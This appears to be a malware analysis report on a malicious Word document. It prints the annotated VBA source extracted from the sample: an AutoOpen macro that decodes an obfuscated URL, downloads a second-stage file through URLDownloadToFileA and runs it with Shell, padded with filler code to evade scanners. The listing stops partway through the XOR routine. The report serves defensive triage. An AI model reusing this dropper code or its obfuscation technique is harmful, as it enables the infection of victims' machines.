Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dcb6852b44d3d74c…

MALICIOUS

Office (OLE)

443.5 KB Created: 2019-01-09 03:14:00 Authoring application: Microsoft Office Word First seen: 2019-01-20
MD5: 88ec8398df34c0fb03618729542462af SHA-1: d3a242273150c89cc624c6de3b19e08fbd4a9b6c SHA-256: dcb6852b44d3d74c59b87cece641ebd4ea68a149903777c9084935963f16eb21
292 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

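The sample contains a VBA macro with an AutoOpen subroutine, a common technique for executing malicious code as soon as the document is opened. The macro uses the URLDownloadToFileA API to download a second-stage payload from a hardcoded URL; in the extracted source the URL and the local file path are not stored in clear text but as Base64 strings that are XOR-decoded at run time with a fixed key. The decoded local path is then passed to Shell, which indicates downloader or dropper functionality that fetches and executes further malicious content.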

Heuristics 9

  • ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Dim DDaGSJryERfPpSPdF: DDaGSJryERfPpSPdF = Array("ixJHDSGwFcTFTRZ""mMsXgCUvNvsbqL""eibtrrCHzbKa""iZWKpFXlPlRJtwVBLtd""RpphOEqqvzyprFw""UYuyyHlfbuNrAHkAPCj")
    Shell$ syGzfiBFPHohp
    End Sub
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function njsMyEWoapAdBJUeYZq Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal uCAgbMYnRzA As Long, _
    ByVal ejDdikgDLrpxOsCXNQ As String, _
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    ByVal IcYsfsZYnyQ As Long) As Long
    Sub AutoOpen()
    Dim AdIyEyaxJvoaE, aTnyrTcBdNJ As Integer
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
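    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample the OLE_VBA_* findings above did recover VBA source (see the extracted macros.bas), so the "no modern VBA project was recovered" wording conflicts with the other results and this finding should be read alongside them rather than on its own.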
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
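    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro (this is the standard OpenXML DrawingML namespace URI, not the second-stage download location; the macro's download URL is stored obfuscated in the script and does not appear in this list in clear text)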

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16657 bytes
SHA-256: 70ce5096634c87293068388d2507145e5b8fd93fbda14d2c97dc47be8b67869f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
220 of 291 identifiers look randomly generated (e.g. 'IERajklgasdnklbvdfnsklsdfujr3209t31') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ZwkoRPuEOeLkyd"
Option Explicit
' Imports URLDownloadToFileA from urlmon under a randomly generated VBA name.
' The five parameters are declared as (Long, String, String, Long, Long); the only
' call visible in this listing (in AutoOpen) passes 0, a decoded string, a second
' decoded string, 0, 0.
' Triage note: the VBA-side name is random, but the Lib and Alias strings have to
' stay in clear text for the import to resolve, which is what the OLE_VBA_DOWNLOAD
' and SC_STR_URLDOWNLOAD heuristics in this report matched on.
Private Declare PtrSafe Function njsMyEWoapAdBJUeYZq Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal uCAgbMYnRzA As Long, _
ByVal ejDdikgDLrpxOsCXNQ As String, _
ByVal eRPNGNiWYCyJ As String, _
ByVal pddzsmZSFyqHypOg As Long, _
ByVal IcYsfsZYnyQ As Long) As Long
' Entry point. AutoOpen is the macro name Word runs automatically when the document
' is opened (the OLE_VBA_AUTOOPEN finding). Stripped of filler, the routine does
' three things: decode a local file path, download to that path through the aliased
' URLDownloadToFileA import, then hand the same path to Shell.
' Analyst note: every counter loop, arithmetic assignment and Array(...) literal in
' this Sub writes to a variable that is never read again; they are padding and can
' be ignored when reading the logic.
Sub AutoOpen()
' Filler: subtract-until-smaller loop, result unused.
Dim AdIyEyaxJvoaE, aTnyrTcBdNJ As Integer
AdIyEyaxJvoaE = 5
aTnyrTcBdNJ = 82
While AdIyEyaxJvoaE < aTnyrTcBdNJ
aTnyrTcBdNJ = aTnyrTcBdNJ - AdIyEyaxJvoaE
Wend
' First obfuscated string: Base64-decoded by IMkIsXtByMF, then XOR-decoded by
' VWSWKMPYtattOHpeXW with the long fixed key. The result is used below both as the
' third argument of the download call (the local file name) and as the Shell target.
Dim syGzfiBFPHohp As String: syGzfiBFPHohp = VWSWKMPYtattOHpeXW(IMkIsXtByMF("KVE6OQABExk1PyEiT01JdCJ9DBEIJDMHRA4UAg=="), "jkflsdajioT@#$*(T$G@IERajklgasdnklbvdfnsklsdfujr3209t31-=0t42-t934t=95e-iwsujdpjfklbvjcxn,dfsjlk9T$#*GAWI*@TG$*(TG#(T(@))@$)$@#(T#)(T$(#T#(GREIGREIRGE)(@$)T)$#T)#$%(%#I%Y#(I%$YIGTRISFGIDS(T$#(ITERITR#T$IT#$UI#T$")
' Filler: unused array holding a single string literal (the doubled quotes are
' escaped quote characters, not separators).
Dim HWjfTFzQgqVKAq: HWjfTFzQgqVKAq = Array("cvaNjMhzQapvDRgIt""EhRIWQjkWdkwAwojG""pnRxGLnDwAcKWgeo""WcQTerItCnviPvqZl""rhberqnVgurg")
Dim sspjILugYSZaAuoQ
' Filler loop, result unused.
Dim WqWRzWfVSNVNl, GYqqLMJAyVqFNsUI As Integer
WqWRzWfVSNVNl = 2
GYqqLMJAyVqFNsUI = 37
While WqWRzWfVSNVNl < GYqqLMJAyVqFNsUI
GYqqLMJAyVqFNsUI = GYqqLMJAyVqFNsUI - WqWRzWfVSNVNl
Wend
' Second obfuscated string: only Base64-decoded here; the XOR step is applied
' inline in the download call below, where it is passed as the second argument
' (the URL position of URLDownloadToFileA).
Dim mJMdEXJYwaV As String: mJMdEXJYwaV = IMkIsXtByMF("Ah8SHElLTltRWnpxEBIEGWMUaXF/ajgABAxCAhkW")
' Filler summation loop, result unused.
Dim eVolnLyjMFK, SRQFTaGraeiFVK As Integer
For SRQFTaGraeiFVK = 0 To 5
eVolnLyjMFK = eVolnLyjMFK + SRQFTaGraeiFVK
Next SRQFTaGraeiFVK
' Download step: URLDownloadToFileA(0, <decoded URL>, <decoded local path>, 0, 0).
' The return value is stored but never inspected.
sspjILugYSZaAuoQ = njsMyEWoapAdBJUeYZq(0, VWSWKMPYtattOHpeXW(mJMdEXJYwaV, "jkflsdajioT@#$*(T$G@IERajklgasdnklbvdfnsklsdfujr3209t31-=0t42-t934t=95e-iwsujdpjfklbvjcxn,dfsjlk9T$#*GAWI*@TG$*(TG#(T(@))@$)$@#(T#)(T$(#T#(GREIGREIRGE)(@$)T)$#T)#$%(%#I%Y#(I%$YIGTRISFGIDS(T$#(ITERITR#T$IT#$UI#T$"), syGzfiBFPHohp, 0, 0)
' Filler: unused array.
Dim DDaGSJryERfPpSPdF: DDaGSJryERfPpSPdF = Array("ixJHDSGwFcTFTRZ""mMsXgCUvNvsbqL""eibtrrCHzbKa""iZWKpFXlPlRJtwVBLtd""RpphOEqqvzyprFw""UYuyyHlfbuNrAHkAPCj")
' Execution step: the decoded local path is passed to Shell unconditionally, i.e.
' whether or not the download call above reported success. This is the line the
' OLE_VBA_SHELL heuristic matched. For detection, the observable chain is the Office
' process writing a file via urlmon and then spawning a child process from it.
Shell$ syGzfiBFPHohp
End Sub
' Base64 decoder with obfuscation padding interleaved between the real statements.
'
' Parameters:
'   DlKDTqguNOPgGGWlJAH - the Base64 text to decode. It is reassigned inside the
'                         function (Trim / Replace).
'   uAkbZlqusRHri       - optional, default True; when True every character outside
'                         [A-Za-z0-9+/=] is stripped from the input before decoding.
' Returns: the decoded bytes converted back to a VBA string; an empty input exits
' early without assigning a return value.
'
' Analyst note: the statements that matter are the ones touching the lookup table
' VkZsRIFlTewOtiK, the input byte array eRKTPbVDYOIppRYQ, the output byte array
' YHFAUXIyBzLjEoYgHh and the accumulator dDIoSjFviwTNtEvjt. Everything else (single
' Integer assignments, While/For counter loops, Array(...) and Collection string
' lists) writes to variables that are never read. The
' "If <constant> < Len(Application.UserName)" blocks contain only such filler, so
' the user-name length does not change the decoded output in the code shown here.
Public Function IMkIsXtByMF(DlKDTqguNOPgGGWlJAH As String, Optional uAkbZlqusRHri As Boolean = True) As String
Dim KcSiDCmKczusNpbCNjm As Integer
KcSiDCmKczusNpbCNjm = 7 - 4 * 3
' Static lookup table: character code -> 6-bit Base64 value. Static, so it keeps
' its contents between calls and is only built once (see the entry-0 test below).
Static VkZsRIFlTewOtiK(0 To 255) As Byte
Dim qxCVZiaPWNvyQzGfni As Integer
qxCVZiaPWNvyQzGfni = 8 - 8 * 1
' YHFAUXIyBzLjEoYgHh = decoded output bytes, eRKTPbVDYOIppRYQ = input bytes.
Dim YHFAUXIyBzLjEoYgHh() As Byte, eRKTPbVDYOIppRYQ() As Byte
Dim KwklitTblAMd As Integer
KwklitTblAMd = 8
Dim uybETXMJKOv As Integer
uybETXMJKOv = 3 * 6
' Filler block gated on the user-name length; body has no effect on decoding.
If KwklitTblAMd < Len(Application.UserName) Then
Dim firSeQQeUiJfQqShoL, grvjMxJlUWzVUTEjmtu As Integer
For grvjMxJlUWzVUTEjmtu = 0 To 5
firSeQQeUiJfQqShoL = firSeQQeUiJfQqShoL + grvjMxJlUWzVUTEjmtu
Next grvjMxJlUWzVUTEjmtu
Dim SiRPicEDharNjLGZym As Variant
End If
' WFIXehQEadYdDlX = shared loop index, dDIoSjFviwTNtEvjt = 24-bit accumulator.
Dim WFIXehQEadYdDlX As Long, dDIoSjFviwTNtEvjt As Long
Dim AmWmPGDtxYwntegAvfg, DlXOrHqBsgnX As Integer
AmWmPGDtxYwntegAvfg = 2
DlXOrHqBsgnX = 36
While AmWmPGDtxYwntegAvfg < DlXOrHqBsgnX
DlXOrHqBsgnX = DlXOrHqBsgnX - AmWmPGDtxYwntegAvfg
Wend
' One-time table initialisation: entry 0 is 0 only before the first fill, because
' the fill below sets every entry (including 0) to 255.
If VkZsRIFlTewOtiK(0) = 0 Then
Dim GDxKfVfBRAUUDCOc As Integer
GDxKfVfBRAUUDCOc = 9 * 5
' Mark every character code as "not a Base64 symbol" (255).
For WFIXehQEadYdDlX = 0 To 255
Dim WivIqEvSsLTZeu, ePuSXZPMhbnd As Integer
For ePuSXZPMhbnd = 0 To 7
WivIqEvSsLTZeu = WivIqEvSsLTZeu + ePuSXZPMhbnd
Next ePuSXZPMhbnd
VkZsRIFlTewOtiK(WFIXehQEadYdDlX) = 255
Dim YNQyEPZoycxaSDDLsw As Integer
YNQyEPZoycxaSDDLsw = 3 - 7 * 2
Next WFIXehQEadYdDlX
Dim qOmWAqMcyqQbGZPYfvF As Integer
qOmWAqMcyqQbGZPYfvF = 4
Dim fMYeNwlpcRZXdxuRTz As Integer
fMYeNwlpcRZXdxuRTz = 7
Dim yRKEaGAfswShVzJ: yRKEaGAfswShVzJ = Array("stIXNjCsUPvJX""IghfYDIYtEQi""cIveQdaVSkUpAyUf""veDfvkIlSHjlWdCsEs""LvoIzruQNITcopm""bVDxgBrvXvDlUSHqnk""bRuoMFjqmcEjkZkLTq""pMQqUXeePyFJph")
' Filler blocks gated on the user-name length.
If fMYeNwlpcRZXdxuRTz < Len(Application.UserName) Then
Dim plLhIahliiGbRanfEO, UpbFaoXutCf As Integer
plLhIahliiGbRanfEO = 1
UpbFaoXutCf = 76
While plLhIahliiGbRanfEO < UpbFaoXutCf
UpbFaoXutCf = UpbFaoXutCf - plLhIahliiGbRanfEO
Wend
Dim cCMRwuFAaUjGVo As Variant
End If
If qOmWAqMcyqQbGZPYfvF < Len(Application.UserName) Then
Dim yfaTNKNHHDsGmYNSu: yfaTNKNHHDsGmYNSu = Array("OqHUyZFXhdttjJcUm""yMDUVrlANIMsaXB""wKomjcookbFBToUuvi""YTcRVVixljBFbDD""UubyPJgOJCLvpSiq""VctwxULCZQonrmWPj""rQdGImUHAtFRGUXDwfm""aucFJyaoDEeRe""ybHhqIOCdKzEbHoUI")
Dim vDwTlpzLTeknQXebCo As Variant
End If
' Codes 65..90 ("A".."Z") map to values 0..25. The Collection built on each
' iteration is filler.
For WFIXehQEadYdDlX = 0 To 25
Dim QIskjlooWFscCX As Integer
QIskjlooWFscCX = 1
Dim cbJZeJcpklVuevjpCe As Collection
Set cbJZeJcpklVuevjpCe = New Collection
cbJZeJcpklVuevjpCe.Add "BLAhnKRtUuIPXLUh"
cbJZeJcpklVuevjpCe.Add "kWlGPqAePEQAP"
cbJZeJcpklVuevjpCe.Add "GrtItifsZhYavHOf"
cbJZeJcpklVuevjpCe.Add "CsKgsEcyJkIy"
If QIskjlooWFscCX < Len(Application.UserName) Then
Dim FstHYpsEINcdowL As Integer
FstHYpsEINcdowL = 6 * 8
Dim nfiyYTQnRndmwue As Variant
End If
VkZsRIFlTewOtiK(WFIXehQEadYdDlX + 65) = WFIXehQEadYdDlX
Dim TnVyPqpwoCWOlL As Integer
TnVyPqpwoCWOlL = 7 * 2
Next WFIXehQEadYdDlX
' Codes 97..122 ("a".."z") map to values 26..51.
For WFIXehQEadYdDlX = 26 To 51
Dim wbajjalzTszaTL, FXTaePFXgUOwwjgOy As Integer
For FXTaePFXgUOwwjgOy = 0 To 9
wbajjalzTszaTL = wbajjalzTszaTL + FXTaePFXgUOwwjgOy
Next FXTaePFXgUOwwjgOy
VkZsRIFlTewOtiK(WFIXehQEadYdDlX + 71) = WFIXehQEadYdDlX
Dim eayNzlqpZpSRwOS, TgpxIMGWAHpxt As Integer
For TgpxIMGWAHpxt = 0 To 8
eayNzlqpZpSRwOS = eayNzlqpZpSRwOS + TgpxIMGWAHpxt
Next TgpxIMGWAHpxt
Next WFIXehQEadYdDlX
Dim izYMVRumZpEnrQ As Integer
izYMVRumZpEnrQ = 2 - 2 * 9
' Codes 48..57 ("0".."9") map to values 52..61.
For WFIXehQEadYdDlX = 52 To 61
Dim olPLTsIyFdPpTzVmOo, AaYMuRuUrcYgxS As Integer
For AaYMuRuUrcYgxS = 0 To 7
olPLTsIyFdPpTzVmOo = olPLTsIyFdPpTzVmOo + AaYMuRuUrcYgxS
Next AaYMuRuUrcYgxS
VkZsRIFlTewOtiK(WFIXehQEadYdDlX - 4) = WFIXehQEadYdDlX
Dim ykJiiymHRfJ, vkdXHxhOfBvxzAb As Integer
ykJiiymHRfJ = 2
vkdXHxhOfBvxzAb = 48
While ykJiiymHRfJ < vkdXHxhOfBvxzAb
vkdXHxhOfBvxzAb = vkdXHxhOfBvxzAb - ykJiiymHRfJ
Wend
Next WFIXehQEadYdDlX
Dim VGGfMtsccEDtV: VGGfMtsccEDtV = Array("WhBqnFDtXepxxuLbaLb""yUQMcpOoOtYvGJ""XYqPkOxUABgj""tKernJOqpLjr""VjuBaOTbgjbbeEEK""mRJaPbpzRYNpZYS""GUzmfnfwdDLyuE")
' Code 43 ("+") maps to 62 and code 47 ("/") maps to 63. "=" (61) is left at 255.
VkZsRIFlTewOtiK(43) = 62
Dim sTZmewDCJEKvrawQcx As Integer
sTZmewDCJEKvrawQcx = 9 * 6
VkZsRIFlTewOtiK(47) = 63
Dim AJKJuSuOOrTDusSqC As Integer
AJKJuSuOOrTDusSqC = 7 * 6
End If
Dim oheQEYweJCSZF As Integer
oheQEYweJCSZF = 7 * 9
' Empty input: leave without assigning a result.
If DlKDTqguNOPgGGWlJAH = "" Then Exit Function
Dim INfchJWCsJmprORN: INfchJWCsJmprORN = Array("BqwLoptKCjVWMCs""ittQFZuwhwUtjxlgs""XqJMhddpzpgPbsaTpbF""dvFmuTZRqsCz""ipKnNHCrHpjlbin")
DlKDTqguNOPgGGWlJAH = Trim(DlKDTqguNOPgGGWlJAH)
Dim dgNagbJktSCQUwN As Integer
dgNagbJktSCQUwN = 4 - 1 * 6
' Optional clean-up pass: for each of the 256 character codes, remove the character
' from the input unless it belongs to the Base64 alphabet or is "=".
If uAkbZlqusRHri Then
Dim grrYKMiwDrV, pNBFYAacIlqwaSwQDyA As Integer
For pNBFYAacIlqwaSwQDyA = 0 To 4
grrYKMiwDrV = grrYKMiwDrV + pNBFYAacIlqwaSwQDyA
Next pNBFYAacIlqwaSwQDyA
For WFIXehQEadYdDlX = 0 To 255
Dim kwjwuGwmRUA, uFBEHlRfbXQIGCtIy As Integer
kwjwuGwmRUA = 4
uFBEHlRfbXQIGCtIy = 55
While kwjwuGwmRUA < uFBEHlRfbXQIGCtIy
uFBEHlRfbXQIGCtIy = uFBEHlRfbXQIGCtIy - kwjwuGwmRUA
Wend
If Not (Chr(WFIXehQEadYdDlX) Like "[A-Za-z0-9+/=]") Then
Dim KekhKWwOtxgDG As Integer
KekhKWwOtxgDG = 5 - 8 * 4
DlKDTqguNOPgGGWlJAH = Replace(DlKDTqguNOPgGGWlJAH, Chr(WFIXehQEadYdDlX), "")
Dim iCqowyZszfRiBBCXsx, TnJpCMTmTqVQobJCu As Integer
iCqowyZszfRiBBCXsx = 1
TnJpCMTmTqVQobJCu = 31
While iCqowyZszfRiBBCXsx < TnJpCMTmTqVQobJCu
TnJpCMTmTqVQobJCu = TnJpCMTmTqVQobJCu - iCqowyZszfRiBBCXsx
Wend
End If
Dim nQdjbpiCEQEGtmGO As Integer
nQdjbpiCEQEGtmGO = 3 - 4 * 7
Next WFIXehQEadYdDlX
Dim fftHjwAFPLrnT, lcgBXorpxCdxGXUnCnS As Integer
fftHjwAFPLrnT = 8
lcgBXorpxCdxGXUnCnS = 49
While fftHjwAFPLrnT < lcgBXorpxCdxGXUnCnS
lcgBXorpxCdxGXUnCnS = lcgBXorpxCdxGXUnCnS - fftHjwAFPLrnT
Wend
End If
Dim vAEPEoHWTxA As Integer
vAEPEoHWTxA = 9 - 4 * 4
' Input text -> one byte per character.
eRKTPbVDYOIppRYQ() = StrConv(DlKDTqguNOPgGGWlJAH, vbFromUnicode)
Dim KBPdZDLRPGJJN, eNRWttQTxQbl As Integer
For eNRWttQTxQbl = 0 To 4
KBPdZDLRPGJJN = KBPdZDLRPGJJN + eNRWttQTxQbl
Next eNRWttQTxQbl
' Output buffer: three bytes for every four input characters.
ReDim YHFAUXIyBzLjEoYgHh(0 To ((Len(DlKDTqguNOPgGGWlJAH) \ 4) * 3 - 1))
Dim DLiQPjIkcrsxmbzTJ, nnMqJdrjbprQtSF As Integer
For nnMqJdrjbprQtSF = 0 To 3
DLiQPjIkcrsxmbzTJ = DLiQPjIkcrsxmbzTJ + nnMqJdrjbprQtSF
Next nnMqJdrjbprQtSF
' Main loop over every 4-character group except the last one: the four table
' values are combined into one 24-bit number (shifts by 0, 6, 12 and 18 bits via the
' &H40, &H1000, &H40000 multipliers) and split into three output bytes.
For WFIXehQEadYdDlX = 0 To Len(DlKDTqguNOPgGGWlJAH) \ 4 - 2
Dim BBhsJttzfpx As Integer
BBhsJttzfpx = 3 - 2 * 4
dDIoSjFviwTNtEvjt = VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 3))
dDIoSjFviwTNtEvjt = dDIoSjFviwTNtEvjt Or (VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 2)) * &H40&)
Dim FhJoVbDVEvcbxd As Integer
FhJoVbDVEvcbxd = 8
Dim rvewNvgCJNxWBGkzEfs As Integer
rvewNvgCJNxWBGkzEfs = 6 * 7
' Filler block gated on the user-name length.
If FhJoVbDVEvcbxd < Len(Application.UserName) Then
Dim iHGjIMqtkaPHH As Collection
Set iHGjIMqtkaPHH = New Collection
iHGjIMqtkaPHH.Add "yQjLHNpyOzIDMEm"
iHGjIMqtkaPHH.Add "VCitFUkxUMvaTOpGSsA"
iHGjIMqtkaPHH.Add "YqUekcqjCdZjknk"
iHGjIMqtkaPHH.Add "OcYFgpjcqWpDxszv"
iHGjIMqtkaPHH.Add "zMMZcrksNFM"
iHGjIMqtkaPHH.Add "ETkgKmxjVsQEBvmhm"
Dim rgMxaZiMtQpmKLYRV As Variant
End If
dDIoSjFviwTNtEvjt = dDIoSjFviwTNtEvjt Or (VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 1)) * &H1000&)
Dim qNCdrhMnjwaY, FwGQOVqRBNEAUnAUddq As Integer
For FwGQOVqRBNEAUnAUddq = 0 To 8
qNCdrhMnjwaY = qNCdrhMnjwaY + FwGQOVqRBNEAUnAUddq
Next FwGQOVqRBNEAUnAUddq
dDIoSjFviwTNtEvjt = dDIoSjFviwTNtEvjt Or (VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 0)) * &H40000)
YHFAUXIyBzLjEoYgHh(WFIXehQEadYdDlX * 3 + 0) = (dDIoSjFviwTNtEvjt And &HFF0000) \ &H10000
Dim wInIWrpLaToFwp, eSiKPRkSMaq As Integer
wInIWrpLaToFwp = 1
eSiKPRkSMaq = 48
While wInIWrpLaToFwp < eSiKPRkSMaq
eSiKPRkSMaq = eSiKPRkSMaq - wInIWrpLaToFwp
Wend
YHFAUXIyBzLjEoYgHh(WFIXehQEadYdDlX * 3 + 1) = (dDIoSjFviwTNtEvjt And &HFF00&) \ &H100&
Dim YNxquJaHweoUIeJCfqn, JiWqWLxSdMDFazPZ As Integer
For JiWqWLxSdMDFazPZ = 0 To 5
YNxquJaHweoUIeJCfqn = YNxquJaHweoUIeJCfqn + JiWqWLxSdMDFazPZ
Next JiWqWLxSdMDFazPZ
YHFAUXIyBzLjEoYgHh(WFIXehQEadYdDlX * 3 + 2) = dDIoSjFviwTNtEvjt And &HFF&
Dim fKtCpSOEIKVOZF: fKtCpSOEIKVOZF = Array("jzyhlAwQOhfY""PqSVvmKRDwY""NfMhWfSHnvVSpiwR")
Next WFIXehQEadYdDlX
Dim kYsrxLIHkNNFqjF, MBmTEkUbdJGbIdoVvfo As Integer
kYsrxLIHkNNFqjF = 7
MBmTEkUbdJGbIdoVvfo = 79
While kYsrxLIHkNNFqjF < MBmTEkUbdJGbIdoVvfo
MBmTEkUbdJGbIdoVvfo = MBmTEkUbdJGbIdoVvfo - kYsrxLIHkNNFqjF
Wend
' Last 4-character group, handled outside the loop. The loop index was left one past
' the loop's upper bound, so it now addresses the final group. Each position is only
' merged in when its table value is not 255, which skips "=" padding.
dDIoSjFviwTNtEvjt = 0
If VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 3)) <> 255 Then dDIoSjFviwTNtEvjt = VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 3))
Dim TvvDSlNcXgNKPZu: TvvDSlNcXgNKPZu = Array("IAqcRGQobvhnL""ZqvwbYdYruoHcYCJP""saSFjUAVSBAdsf""cCkHOLdgPjnUNQBUo""nfKvUjUaWPZ""qBZGiTYuxphTBQlzdM""IGQJfjBPxdk""MupevDdLRenJyRlTH")
If VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 2)) <> 255 Then dDIoSjFviwTNtEvjt = dDIoSjFviwTNtEvjt Or (VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 2)) * &H40&)
Dim VWouSgJlkaS As Integer
VWouSgJlkaS = 5 * 3
If VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 1)) <> 255 Then dDIoSjFviwTNtEvjt = dDIoSjFviwTNtEvjt Or (VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 1)) * &H1000&)
Dim rDPxWXjSfTf As Integer
rDPxWXjSfTf = 1 - 1 * 3
If VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 0)) <> 255 Then dDIoSjFviwTNtEvjt = dDIoSjFviwTNtEvjt Or (VkZsRIFlTewOtiK(eRKTPbVDYOIppRYQ(WFIXehQEadYdDlX * 4 + 0)) * &H40000)
YHFAUXIyBzLjEoYgHh(WFIXehQEadYdDlX * 3 + 0) = (dDIoSjFviwTNtEvjt And &HFF0000) \ &H10000
Dim OQSjdUySLJeBNDJHDA As Integer
OQSjdUySLJeBNDJHDA = 3 * 2
YHFAUXIyBzLjEoYgHh(WFIXehQEadYdDlX * 3 + 1) = (dDIoSjFviwTNtEvjt And &HFF00&) \ &H100&
' Filler: unused Collection of random strings.
Dim EGeZBfvUVnGH As Collection
Set EGeZBfvUVnGH = New Collection
EGeZBfvUVnGH.Add "UzwyyMzDjHg"
EGeZBfvUVnGH.Add "zNTvdVnVKvzNoWrHRN"
EGeZBfvUVnGH.Add "vBkHBuSXhEEieWN"
EGeZBfvUVnGH.Add "lKpIwSumLpaSSKWUtCn"
EGeZBfvUVnGH.Add "xLmVEnSssDEvygQYgWp"
EGeZBfvUVnGH.Add "ExnCKjclULaNLYI"
EGeZBfvUVnGH.Add "XsNzTuDpGXr"
EGeZBfvUVnGH.Add "FjigTYLnguG"
EGeZBfvUVnGH.Add "cNCEdPsyGXqYGVzbM"
EGeZBfvUVnGH.Add "jmfixysPkiaeq"
YHFAUXIyBzLjEoYgHh(WFIXehQEadYdDlX * 3 + 2) = dDIoSjFviwTNtEvjt And &HFF&
Dim pNBstcNQJZyIVmZxWho, GNBoDrInYZqLpt As Integer
For GNBoDrInYZqLpt = 0 To 4
pNBstcNQJZyIVmZxWho = pNBstcNQJZyIVmZxWho + GNBoDrInYZqLpt
Next GNBoDrInYZqLpt
' Padding handling (61 is the character code of "="): with "=" in the second-to-last
' position the result is cut by two characters, with "=" only in the last position
' by one character, otherwise the whole buffer is returned.
If eRKTPbVDYOIppRYQ(UBound(eRKTPbVDYOIppRYQ) - 1) = 61 Then
Dim UZMrohfxKMdOu As Integer
UZMrohfxKMdOu = 5 - 8 * 2
IMkIsXtByMF = Left(StrConv(YHFAUXIyBzLjEoYgHh, vbUnicode), UBound(YHFAUXIyBzLjEoYgHh) - 1)
Dim shAgecNEOnfbByzae: shAgecNEOnfbByzae = Array("UzYGFgDEOGTOnbQhAZ""itiuULIUPbb""VBivwiMblPrzpvbwmkK""YllnajcxjHjZGqH""vGRICglRJPMrkEjJA""yDGaTXKnASRDJ")
ElseIf eRKTPbVDYOIppRYQ(UBound(eRKTPbVDYOIppRYQ)) = 61 Then
Dim YgWMUZCHfEz As Integer
YgWMUZCHfEz = 6 - 5 * 5
IMkIsXtByMF = Left(StrConv(YHFAUXIyBzLjEoYgHh, vbUnicode), UBound(YHFAUXIyBzLjEoYgHh) - 0)
Else
Dim vStbXBQzTokEJllb As Integer
vStbXBQzTokEJllb = 4 * 3
IMkIsXtByMF = StrConv(YHFAUXIyBzLjEoYgHh, vbUnicode)
Dim MdLvZkwCmPodeWD As Integer
MdLvZkwCmPodeWD = 7 * 6
End If
End Function
' Repeating-key XOR over a string.
'
' Parameters:
'   sdqiUtKTmgpBroFLF - the data string (in this listing always the output of the
'                       Base64 decoder IMkIsXtByMF).
'   tivmdQSaAdYHE     - the key string (in this listing always the same long literal).
' Returns: the data bytes XORed with the key bytes, converted back to a VBA string.
' Because XOR is its own inverse, the same routine encodes and decodes.
'
' Analyst note: only the statements touching aNYhentkPUlP (data bytes),
' oGrqPCJBHHSApVIr (key bytes), the two UBound values, the loop index and the key
' index carry logic. The remaining assignments, Array(...) literals and the
' "If <constant> < Len(Application.UserName)" blocks are filler whose results are
' never read. The key index is a local Long that reuses the name of the Base64
' decoder's parameter (DlKDTqguNOPgGGWlJAH); the two are unrelated.
Public Function VWSWKMPYtattOHpeXW(ByRef sdqiUtKTmgpBroFLF As String, ByRef tivmdQSaAdYHE As String) As String
Dim jlvafWYFzwxVSx, uCtIcEQlYmBlHuFB As Integer
For uCtIcEQlYmBlHuFB = 0 To 5
jlvafWYFzwxVSx = jlvafWYFzwxVSx + uCtIcEQlYmBlHuFB
Next uCtIcEQlYmBlHuFB
Dim aNYhentkPUlP() As Byte, oGrqPCJBHHSApVIr() As Byte, UTOJNszvSlDvulxA As Long, ImdrIInUtnxAx As Long, TrPZXGuJzfD As Long, DlKDTqguNOPgGGWlJAH As Long
' Data string -> one byte per character.
aNYhentkPUlP = StrConv(sdqiUtKTmgpBroFLF, vbFromUnicode)
Dim fUKaHihfTNA As Integer
fUKaHihfTNA = 4
Dim OROSFKgOPKGvf As Integer
OROSFKgOPKGvf = 4 * 7
' Filler block gated on the user-name length.
